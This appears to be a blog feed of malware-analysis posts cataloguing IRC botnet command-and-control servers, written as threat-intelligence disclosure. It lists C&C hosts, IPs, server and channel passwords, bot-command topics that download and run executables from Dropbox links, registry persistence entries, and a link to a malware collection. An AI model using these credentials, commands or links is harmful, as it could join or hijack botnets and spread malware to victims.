Author: Pig

im.maximum-irc.info(Dee aka lamer botnet)

Uncategorized

im.maximum-irc.info:9595 im.maximum-irc.info ip: 94.23.159.57 im.maximum-irc.info ip: 91.121.154.194 im.maximum-irc.info ip: 139.91.102.101 Nick: [usa|00|XP|P|30808] Username: brrpyrb Server Pass: Peja0444@ Joined Channel: #!!IM!! with Password fatj00 Channel Topic for Channel #!!IM!!: “.dl.start http://dl.dropbox.com/u/14684555/r.exe C:r.exe 1 -s” server:139.91.102.101 port:9595 chanel: Now talking in #Security-Check Topic On: [ #Security-Check ] [ ] Topic By: [ Dee ] Modes On: [Read more...

irc.rootswitch.net

Uncategorized

Remote Host Port Number 72.20.16.227 6667 PING irc.rootswitch.net USER [{NEW}|USA|XP|3015|COMPUTERNAME] True * :Final NICK [{NEW}|USA|XP|3015|COMPUTERNAME] JOIN ##MafiaWars## secret_ninja PONG :You have not registered Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + d-winlogon = “%AppData%winlogond-winlogon.exe” so that d-winlogon.exe runs every time Windows starts File System Modifications * The following files were createdRead more...

x1x4x0.net(iBOT from the russian tzar snk 30k estimated botnet)

Uncategorized

C&C Server: 64.27.11.98:5500 Server Password: Username: x Nickname: INF|DEU|XP|DELL-D3E62F7E26|hsrpbjkx Channel: #newgen# (Password: (null)) Channeltopic: :.j .s /120/120/82/84/61/37/13/102/97/107/48/106/69/117/103/99/116/116/123/46/83/101/112/101/121/119/73/82/106/121/118/116/81/123/57/103/73/99/10/71/64/99/70/101/111/120/79/125/121/78/69/108/124/52/112/75/119/43/125/107/118/105/67/45/65/76/81/39/52/57/41/19/35/39/20/58/50/50/58/94/90/89/ #newgen# Topic By: [ n ] Outgoing connection to remote server: rapidshare.com TCP port 80 Outgoing connection to remote server: rs259l34.rapidshare.com TCP port 80 Here u have all his dns names used for botnets more will come laterRead more...

comegetrocked.servequake.com(Ganja Bot)

Uncategorized

Remote Host Port Number 217.23.13.116 6667 NICK n{USA|XP}338226 USER 4981 “” “TsGh” :4981 PONG :7656ABE7 JOIN #Ganja Monster PRIVMSG #Ganja :New Infection! PONG :comegetrocked.servequake.com Now talking in #Ganja Topic On: [ #Ganja ] [ Fud Ganja —>http://dl.dropbox.com/u/12206167/Ganja.exe dont bother trying to jack our bots bc we have auth-host and a way to weed you out.Read more...

78.84.173.243

Uncategorized

Remote Host Port Number 72.233.89.199 80 91.198.22.71 80 78.84.173.243 9595 PASS prison PONG leaf.15169.com NICK {iNF-00-USA-XP-COMP-7155} USER MEAT * 0 :COMP JOIN ###mini NICK {00-USA-XP-COMP-6745} Other details * The following ports were open in the system: Port Protocol Process 1051 TCP usbmgr.exe (%Windir%usbmgr.exe) 1053 TCP usbmgr.exe (%Windir%usbmgr.exe) 1054 TCP usbmgr.exe (%Windir%usbmgr.exe) Registry Modifications * TheRead more...

srv.biz(iBOT snk the russian tzar)

Uncategorized

Remote Host Port Number 93.185.68.130 5500 NICK INF|USA|XP|COMPUTERNAME|frgqazsa USER x “” “lol” 😡 JOIN #newgen# PONG 422 PONG :srv.biz Topic On: [ #newgen# ] [ .j .s /120/120/82/84/61/37/13/102/97/107/48/106/69/117/103/99/116/116/123/46/79/101/111/112/104/125/87/83/98/110/109/126/69/47/116/107/75/33/67/64/66/101/65/104/111/124/123/75/125/66/67/110/55/106/104/83/56/125/121/103/112/107/27/64/88/70/34/39/54/62/44/27/43/37/22/59/51/44/94/68/77/ ] #newgen# Topic By: [ s ] Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + MicrosoftMSDUpdateService = “%AppData%Microsoft-5858-2574winsvcrn.exe” so that winsvcrn.exe runs everyRead more...

irc.wilddk.com

Uncategorized

irc.wilddk.com:6667 PASS (SelamS234) NICK raGe|ruHzKJcnEU USER dcwirte “fo7.net” “rage” :dcwirte NICK raGe|siNiTqFcCe USER hmfdcgnfu “fo3.net” “rage” :hmfdcgnfu NICK raGe|TpAcLwoTJl USER itfhmhw “fo2.net” “rage” :itfhmhw Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Update = “%ProgramFiles%Common FilesSystemexplorerz.exe” so that explorerz.exe runs every time Windows starts Memory Modifications * There were newRead more...

15 mb exe malwares

Uncategorized

Here another collection of malwares for people who like styding or reversing them Download: http://4bd4fa2f.thosegalleries.com

217.23.13.240

Uncategorized

Remote Host Port Number 217.23.13.240 6374 NICK n{USA|XP}417752 USER 3940 “” “TsGh” :3940 JOIN #nade2# PONG :irc.NaDe.gov * The following port was open in the system: Port Protocol Process 1055 TCP hidserv.exe (%AppData%hidserv.exe) Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%hidserv.exe” so that hidserv.exe runs everyRead more...

46.4.245.19

Uncategorized

Remote Host Port Number 46.4.245.19 6667 NICK n[XP-USA]724493 USER 8653 “” “TsGh” :8653 JOIN #PhobiiA r00t8585 PONG :BoTNeT.GoV NICK n{USA|XP}045555 USER 9218 “” “TsGh” :9218 JOIN #blazinshotguns badass PONG :BoTNeT.GoV * The following port was open in the system: Port Protocol Process 1055 TCP taskeng.exe (%AppData%taskeng.exe) Registry Modifications * The newly created Registry Values are:Read more...